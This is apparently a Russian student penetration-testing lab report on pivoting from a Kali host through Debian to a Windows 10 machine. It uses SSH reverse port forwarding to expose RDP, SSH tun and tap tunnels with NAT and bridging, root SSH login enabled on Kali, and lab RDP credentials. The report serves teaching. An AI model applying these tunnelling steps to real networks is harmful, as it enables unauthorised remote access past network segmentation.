# Тестирование на проникновение - 4 ## Луговой Илья, БСБО-05-20 ## SSH Port Forwarding ### Инфраструктура ![](https://i.imgur.com/DorMwy5.png) ### Kali -> Windows 10 #### Windows 10 Для установления Reverse Shell с пробросом порта для RDP выполняем команду: ``` ssh -R 3395:localhost:3389 user@192.168.178.129 ``` > *192.168.178.129* - **Kali** #### Kali Просматриваем текущие соединения: ``` ss -tunlp ``` ![](https://i.imgur.com/2T5j8sK.png) Теперь можно подлючится по RDP к Windows 10: ``` xfreerdp /u:admin /p:eve@123 /v:127.0.0.1:3395 ``` ![](https://i.imgur.com/tfQdiUF.png) ### Kali -> Debian -> Windows 10 #### Debian Настраиваем интерфейс для подключения к сети: ``` sudo nano /etc/networking/interfaces # The primary network interface auto ens3 allow-hotplug ens3 iface ens3 inet dhcp ``` ![](https://i.imgur.com/q2JRFvP.png) ``` sudo service networking restart ``` Устанавливаем Reverse Shell с пробросом RDP порта от Windows 10: ``` ssh -R 3395:192.168.1.105:3389 user@192.168.178.129 ``` > *192.168.1.105* - **Windows 10** > *192.168.178.129* - **Kali** #### Kali ``` xfreerdp /u:admin /p:eve@123 /v:127.0.0.1:3395 ``` ![](https://i.imgur.com/fhS9LTS.png) ## L3 ### Инфраструктура ![](https://i.imgur.com/DorMwy5.png) ### Kali Запускаем службу SSH и настраиваем ее для возможности подключения под **root** и разрешения проброса туннеля: ``` sudo nano /etc/ssh/sshd_config PermitRootLogin yes PermitTunnel yes ``` ``` sudo service ssh restart sudo passwd root ``` ### Debian Подключаемся к Kali с пробросом туннеля: ``` ssh -w 0:0 root@192.168.178.129 ``` > *192.168.178.129* - **Kali** ![](https://i.imgur.com/CRyEZST.png) ### Kali ![](https://i.imgur.com/C8A6RUQ.png) Влючаем интерфейс **tun0** и назначаем на него IP: ``` sudo -i ip addr add 10.8.0.1/24 dev tun0 ip link set tun0 up ``` ![](https://i.imgur.com/oYxlbda.png) ### Debian То же самое проделываем на Debian: ``` sudo -i ip addr add 10.8.0.2/24 dev tun0 ip link set tun0 up ``` ![](https://i.imgur.com/KpruvSk.png) ``` nano /etc/sysctl.conf net.ipv4.ip_forward=1 ``` Настраиваем NAT для доступа к устройствам сети извне: ``` sysctl -p iptables -t nat -A POSTROUTING -o ens3 -j MASQUERADE ``` ### Kali Прописываем статический маршрут на **tun0** для доступа к новой сети: ``` ip route add 192.168.1.0/24 via 10.8.0.1 ``` Теперь можно подключиться по RDP к Windows 10: ``` xfreerdp /u:admin /p:eve@123 /v:192.168.1.107:3389 ``` > *192.168.1.107* - **Windows 10** ## L2 ### Инфраструктура ![](https://i.imgur.com/P8WbvvN.png) #### Debian Устанавливаем необходимый пакет для организации мостов: ``` sudo apt install bridge-utils ``` Настраиваем интерфейсы и мост: ``` sudo nano /etc/networking/interfaces # The primary network interface auto ens3 iface ens3 inet manual auto ens4 iface ens4 inet manual auto br0 iface br0 inet dhcp bridge_ports ens3 ens4 ``` ![](https://i.imgur.com/dpL2Qp6.png) ![](https://i.imgur.com/t0sHRLf.png) Устанавливаем SSH соединение с прокладкой туннеля: ``` sudo ssh root@192.168.178.129 -o Tunnel=ethernet -w any:any ``` > *192.168.178.129* - **Kali** Включаем интерфейс и донастраиваем мост: ``` sudo ip link set tap0 up sudo brctl addif br0 tap0 sudo brctl show ``` ![](https://i.imgur.com/diE6WgB.png) #### Kali Донастраиваем интерфейс: ``` sudo ip link set tap0 up sudo dhclient tap0 ``` ![](https://i.imgur.com/5yT63nI.png) ![](https://i.imgur.com/JPGbrBU.png)